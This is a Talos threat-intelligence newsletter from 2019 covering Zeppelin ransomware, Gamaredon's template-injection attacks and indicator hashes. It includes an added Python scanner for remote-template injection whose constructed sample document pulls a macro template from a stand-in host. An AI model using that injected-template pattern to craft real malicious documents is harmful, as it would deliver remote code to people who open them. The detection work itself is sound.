Newsletter compiled by Jon Munshaw.
Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.
We have an early holiday present for you! This week, we introduced a new podcast to the Talos family. Talos Takes, a new short-form show, takes listeners through a quick breakdown of a particular topic or security news story, with our Talos spin. The first three episodes are available now on the Talos podcasts page, and on the Beers with Talos feed. In 2020, we’ll give Talos Takes its own feed you’ll be able to subscribe to.
Not to be overshadowed, there is also a new Beers with Talos episode available just in time for your holiday road trip. This week’s episode features special guest Joe Marshall from the Talos Outreach team, who brings his expertise on IoT and ICS security to the table.
To wrap up the year, we released a blog post running through the top malware and cyber news stories of 2019. This post is a perfect place to look back on all the major research we put out this year.
Cisco’s annual winter shutdown begins next week, so this will be the last Threat Source newsletter until Jan. 9. See you in 2020!
**Title:** New malware-as-a-service family targets tech, health care companies
**Description:** The new Zeppelin ransomware is targeting health care and tech companies in the U.S. and Europe. Researchers believe Zeppelin is a variant of the ransomware-as-a-service family known as Vega. While Vega started out earlier this year targeting Russian-speaking victims, researchers believe the malware could now be in a new adversary's hands, since the current campaigns target users elsewhere. Zeppelin is highly configurable and can be deployed as an EXE, as a DLL, or wrapped in a PowerShell loader.
**Snort SIDs:** 52451 – 52453 (By Nicholas Mavis)

**Title:** Gamaredon attacks spread to Ukrainian journalists, law enforcement agencies
**Description:** A well-known APT is expanding its pool of targets, now going after journalists and law enforcement agencies in Ukraine. The group, which is believed to have Russian ties based on the language used in its malware, previously went after Ukrainian military and government agencies. There are also new TTPs associated with this group, including the use of template injection.
**Snort SIDs:** 52445 – 52448 (By Joanne Kim)
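Template injection, the TTP mentioned above, works by pointing a document's `attachedTemplate` relationship (in `word/_rels/settings.xml.rels`) at a remote `.dotm`, which Word fetches and executes when the file opens. The scanner below is an added example written for this newsletter, not Talos or Snort code: it unzips an OOXML package, walks every `.rels` part, and reports external relationships, flagging only templates that resolve to a remote host so that the very common benign case (a `file:///C:/...Normal.dotm` reference) is not reported. The two sample documents and the host name `template.example` are constructed for the demonstration.

```python
"""Scan an OOXML document for remote-template injection.

Added example (not Talos code). Word resolves the attachedTemplate
relationship in word/_rels/settings.xml.rels when a document opens; if it
has TargetMode="External" and points at a remote host, the template (and
any macros in it) is fetched from that host.
"""
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
ATTACHED_TEMPLATE = (
    "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
)


def find_external_relationships(docx_bytes):
    """Return (part, relationship_type, target) for every TargetMode="External" relationship."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(RELS_NS + "Relationship"):
                if rel.get("TargetMode") == "External":
                    hits.append((name, rel.get("Type"), rel.get("Target", "")))
    return hits


def _is_remote(target):
    """True for http(s) URLs, UNC paths and file:// URLs that name a host; False for local paths."""
    if target.startswith("\\\\"):
        return True
    parts = urlsplit(target)
    if parts.scheme in ("http", "https"):
        return True
    return parts.scheme == "file" and bool(parts.netloc)


def find_remote_templates(docx_bytes):
    """Return the targets of attachedTemplate relationships that point off-host."""
    return [
        target
        for _part, rel_type, target in find_external_relationships(docx_bytes)
        if rel_type == ATTACHED_TEMPLATE and _is_remote(target)
    ]


def _build_docx(rels_xml):
    """Build a minimal package containing only the parts the scanner reads (constructed sample)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/_rels/settings.xml.rels", rels_xml)
    return buf.getvalue()


RELS_HEADER = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
)

# Constructed sample 1: the normal case, an External relationship to the user's local Normal.dotm.
BENIGN_DOCX = _build_docx(
    RELS_HEADER
    + '<Relationship Id="rId1" Type="' + ATTACHED_TEMPLATE + '"'
    + ' Target="file:///C:/Users/alice/AppData/Roaming/Microsoft/Templates/Normal.dotm"'
    + ' TargetMode="External"/>'
    + "</Relationships>"
)

# Constructed sample 2: template injection, the template is pulled from a hypothetical remote host.
INJECTED_DOCX = _build_docx(
    RELS_HEADER
    + '<Relationship Id="rId1" Type="' + ATTACHED_TEMPLATE + '"'
    + ' Target="http://template.example/stage2.dotm" TargetMode="External"/>'
    + "</Relationships>"
)

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_DOCX), ("injected", INJECTED_DOCX)):
        print(label, find_remote_templates(doc))
```

Run against a real `.docx`, `find_external_relationships` will also surface external hyperlinks and OLE links, which is why `find_remote_templates` filters on the relationship type rather than on `TargetMode` alone.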
**SHA 256:** d73ea76f6f07f96b337335213418b58e3fbc7e4b519fec0ef3fbd19c1d335d81
**MD5:** 5142c721e7182065b299951a54d4fe80
**Typical Filename:** FlashHelperServices.exe
**Claimed Product:** Flash Helper Service
**Detection Name:** PUA.Win.Adware.Flashserv::1201

**SHA 256:** 0cdd2a671195915d9ffb5c9533337db935e0cc2f4d7563864ea75c21ead3f94
**MD5:** 7c38a43d2ed9af80932749f6e80fea6f
**Typical Filename:** xme64-520.exe
**Claimed Product:** N/A
**Detection Name:** PUA.Win.File.Coinminer::1201

**SHA 256:** 1c3ed460a7f78a43bab0ae575056d00c629f35cf7e72443b4e874ede0f305871
**MD5:** c2406fc0fce67ae79e625013325e2a68
**Typical Filename:** SegurazoIC.exe
**Claimed Product:** Digital Communications Inc.
**Detection Name:** PUA.Win.Adware.Ursu::95.sbx.tg

**SHA 256:** f917be677daab5ee91dd3e9ec3f8fd027a58371524f46dd314a13aefc78b2ddc
**MD5:** c5608e40f6f47ad84e2985804957c342
**Typical Filename:** FlashHelperServices.exe
**Claimed Product:** Flash Helper Service
**Detection Name:** PUA:2144FlashPlayer-tpd

**SHA 256:** 15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b
**MD5:** 799b30f47060ca05d80ece53866e01cc
**Typical Filename:** mf2016341595.exe
**Claimed Product:** N/A
**Detection Name:** W32.Generic:Gen.22fz.1201
Keep up with all things Talos by following us on Twitter. Snort, ClamAV and Immunet also have their own accounts you can follow to keep up with their latest updates. You can also subscribe to the Beers with Talos podcast here (as well as on your favorite podcast app). And, if you’re not already, you can also subscribe to the weekly Threat Source newsletter here.